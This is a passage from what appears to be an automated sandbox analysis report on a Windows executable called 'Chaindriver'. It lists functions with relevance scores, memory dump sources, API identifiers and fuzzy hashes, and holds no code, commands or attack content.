                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileHandleRead
                                                    • String ID:
                                                    • API String ID: 2244327787-0
                                                    • Opcode ID: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                                    • Instruction ID: c13aedec008af3ca270b01616465980ee98065f696b45409071c0dae32ac14d7
                                                    • Opcode Fuzzy Hash: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                                    • Instruction Fuzzy Hash: 66217F21E0860289EA30AF15AC2023DE3B0FB45B94FD44130DA5E4AB94CE3CFA859F74
                                                    Function 00007FF720B4EA20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreatePriority
                                                    • String ID: CreateThread failed
                                                    • API String ID: 2610526550-3849766595
                                                    • Opcode ID: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                                    • Instruction ID: 102d08a36f20fe251197a09b5556fd257ef1f87113322d6041956b5738a799fd
                                                    • Opcode Fuzzy Hash: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                                    • Instruction Fuzzy Hash: 18114C35A18A4281EA20AB14EC5116EB360FB84784FD44531D65E02B69DF3CF682CF70
                                                    Function 00007FF720B593EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: DirectoryInitializeMallocSystem
                                                    • String ID: riched20.dll
                                                    • API String ID: 174490985-3360196438
                                                    • Opcode ID: a2ea48ad6eaf40a2712c31cf90fd1ad0c531bf965d53d4a99af5176349890e79
                                                    • Instruction ID: 10087593dccec33ea34199783160363d8faf1a17b6172273754db397abdf9098
                                                    • Opcode Fuzzy Hash: a2ea48ad6eaf40a2712c31cf90fd1ad0c531bf965d53d4a99af5176349890e79
                                                    • Instruction Fuzzy Hash: 9DF04F76A18A4582EB61AF20EC1516EF3A0FB88754F800135E58E42B64DF7CE258CF20
                                                    Function 00007FF720B323F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2176759853-0
                                                    • Opcode ID: 3e846a75996b98d67bcbe2fcf7b7e177c7c4e3bf59ed455f02099cc6229e5177
                                                    • Instruction ID: 9329019c5d3782fde08b67fda0f2f059841303e38f9652807d93d31275b5cc3d
                                                    • Opcode Fuzzy Hash: 3e846a75996b98d67bcbe2fcf7b7e177c7c4e3bf59ed455f02099cc6229e5177
                                                    • Instruction Fuzzy Hash: 4E21A472A18B8181EA249B65AC4017EB364FB89BD0F545235EB9E03B95DF3CE190CB50
                                                    Function 00007FF720B43CF4 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1203560049-0
                                                    • Opcode ID: 78a323c9e83038540e709c0a306e8d1f319ba5efdf3dbb668891aceacb5d3961
                                                    • Instruction ID: c79f70a6067a7723049380774ce5d0a80f0f7c52d6a77ec1fcc82344310b285a
                                                    • Opcode Fuzzy Hash: 78a323c9e83038540e709c0a306e8d1f319ba5efdf3dbb668891aceacb5d3961
                                                    • Instruction Fuzzy Hash: 2421BB22E18A4181EE30AB25FC5427DA361FF88B94F945234EA9E437D5DF3CE544CA60
                                                    Function 00007FF720B4317C Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3118131910-0
                                                    • Opcode ID: 5034e80f18b6dada672af72daf15915e96673b2d3326e463545c04a976a4a92e
                                                    • Instruction ID: 0cc295b706cac6490c99a274c10527ad7a470ec38c8696800cc8e47780f4cd5c
                                                    • Opcode Fuzzy Hash: 5034e80f18b6dada672af72daf15915e96673b2d3326e463545c04a976a4a92e
                                                    • Instruction Fuzzy Hash: 1F217C22A1878181EA20AB25FC5516EB361FB84B94F941234EA9E56B95DF3CF540CE70
                                                    Function 00007FF720B4327C Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1203560049-0
                                                    • Opcode ID: 7118c4e6fffe30651da94a39ba5f8c81167afa32e221d2e2d046fdc79b46f602
                                                    • Instruction ID: 7c468b5f8a09cf1eb3b6a6bbb3bd5972e58d261fdd3976d5f8d537a71b205f91
                                                    • Opcode Fuzzy Hash: 7118c4e6fffe30651da94a39ba5f8c81167afa32e221d2e2d046fdc79b46f602
                                                    • Instruction Fuzzy Hash: EA217C22A1868181EA20AB29FC5416DA361FBC4B94F940235EA9E43BD5DF3CE5458E24
                                                    Function 00007FF720B322BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: Item_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1746051919-0
                                                    • Opcode ID: f6d8c5fbbcd0c2d54c192febb6712a66cb73e134d8dca87a5b887cf4e1c9eeef
                                                    • Instruction ID: fd1e124bc6a965ecb1c0c6df99da2385b70633c5236cbc197ca89896fcb0a53c
                                                    • Opcode Fuzzy Hash: f6d8c5fbbcd0c2d54c192febb6712a66cb73e134d8dca87a5b887cf4e1c9eeef
                                                    • Instruction Fuzzy Hash: 8E31A132E1878686EA24AB15EC4537EB361EB84790F944235EB9E07B95DF3CF5408B24
                                                    Function 00007FF720B42A90 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushTime
                                                    • String ID:
                                                    • API String ID: 1392018926-0
                                                    • Opcode ID: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                                    • Instruction ID: 1f2d7c7034d2fa822df64f78b12b64302ad8581121d1b6253a8b0fcd1e28a667
                                                    • Opcode Fuzzy Hash: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                                    • Instruction Fuzzy Hash: 6221D122E4974251EE71AB51DC2037EA791EF01794FD94031CE4E06391EE3CF68ADA30
                                                    Function 00007FF720B4AAA0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: LoadString
                                                    • String ID:
                                                    • API String ID: 2948472770-0
                                                    • Opcode ID: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
                                                    • Instruction ID: 727ea5eb2a70d3f11a6a733591764496f3a8f08a629ca80466992d1505fd83e7
                                                    • Opcode Fuzzy Hash: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
                                                    • Instruction Fuzzy Hash: A3117C61B1864986EA20AF16AD4442CF7A1FB89FC0B948435CE1E93721DF3CF6018F68
                                                    Function 00007FF720B42B70 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                                    • Instruction ID: 0615db6524c2e435f589058d68b9f4e077e972eced851df18c3171d478339c9d
                                                    • Opcode Fuzzy Hash: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                                    • Instruction Fuzzy Hash: 1D115E21E1864181FB70AB25EC8127DA760EB44BA4FD44331DA2E567D5CF3CE686DB20
                                                    Function 00007FF720B4EAD4 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF720B4EB29,?,?,?,?,00007FF720B45712,?,?,?,00007FF720B4569E), ref: 00007FF720B4EAD8
                                                    • GetProcessAffinityMask.KERNEL32 ref: 00007FF720B4EAEB
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID:
                                                    • API String ID: 1231390398-0
                                                    • Opcode ID: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                                    • Instruction ID: 16b62b9c9b010fba86b65812bad23e1a417dc9a2eb27e040384d6c697b96c992
                                                    • Opcode Fuzzy Hash: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                                    • Instruction Fuzzy Hash: ECE0E561B1458682DF199B59CC955AEE391FF88B40BC48036E50B83B14DE2CF2498F20
                                                    Function 00007FF720B62150 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                    • String ID:
                                                    • API String ID: 1173176844-0
                                                    • Opcode ID: 1bb7e24e02d919eeb5b6f2c6636e471bde2a2032dbf585f53a3051670f130e73
                                                    • Instruction ID: 84b977227532e0e651c04db7f4d00e785b94f658fd0ca1c837f8c3e733df40ab
                                                    • Opcode Fuzzy Hash: 1bb7e24e02d919eeb5b6f2c6636e471bde2a2032dbf585f53a3051670f130e73
                                                    • Instruction Fuzzy Hash: BCE0B648E1D90B01FA3833615C651BD8154CF5A770EA81B38DB3F187C6AD2CB4924930
                                                    Function 00007FF720B333E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 0775a86a686ea590aaf7c9edd055dabde09601dbd76f09eba2acf58d909f3722
                                                    • Instruction ID: 7d0f38ca261041f90fdc6fc304ac8d0642be2ae8c971f2728dfd9def0bfc764e
                                                    • Opcode Fuzzy Hash: 0775a86a686ea590aaf7c9edd055dabde09601dbd76f09eba2acf58d909f3722
                                                    • Instruction Fuzzy Hash: ABD1A862B0868155EB78AB259D842BEE7A1FB55F84F940035DB5E47BA1CF38F4608B30
                                                    Function 00007FF720B5CA50 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: ccc6f9a6790b431fd1ab8e253d0064bfce7d4e51591ba4d521b92c82876fdba2
                                                    • Instruction ID: 167d23d9e310a823c8f43eef4dcaead3914b445b5e472ac2d43fb864a2735736
                                                    • Opcode Fuzzy Hash: ccc6f9a6790b431fd1ab8e253d0064bfce7d4e51591ba4d521b92c82876fdba2
                                                    • Instruction Fuzzy Hash: 12919662F1461188FB20EB64DC441AC6BB6EF00769F940635DA1E52BD9DF78E981C770
                                                    Function 00007FF720B3129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                    • String ID:
                                                    • API String ID: 680105476-0
                                                    • Opcode ID: 8fc7eae5c4670fc1140e9880ae56cf99f2ea895d36ba7cddaaf7ea12a3bcbbde
                                                    • Instruction ID: 89eb7fc080ff7b565645095d909e6dac016cc3c7bbcbb785918a7160bf9cb993
                                                    • Opcode Fuzzy Hash: 8fc7eae5c4670fc1140e9880ae56cf99f2ea895d36ba7cddaaf7ea12a3bcbbde
                                                    • Instruction Fuzzy Hash: 4F218122A0865195EA24AB91AC4027DA258EB05BF0FA80F35DE7F47FD1DE7CF0518B64
                                                    Function 00007FF720B711CC Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                                    • Instruction ID: 91e0c8ef90eed8bd30a688c710b4ad7347b3e874d78f00bd67c0fd8231ba5e28
                                                    • Opcode Fuzzy Hash: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                                    • Instruction Fuzzy Hash: 37113D2291C68286E630AB59AC4453DF2A4FB44380F950935E68F877AADF2CF9008F34
                                                    Function 00007FF720B33AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
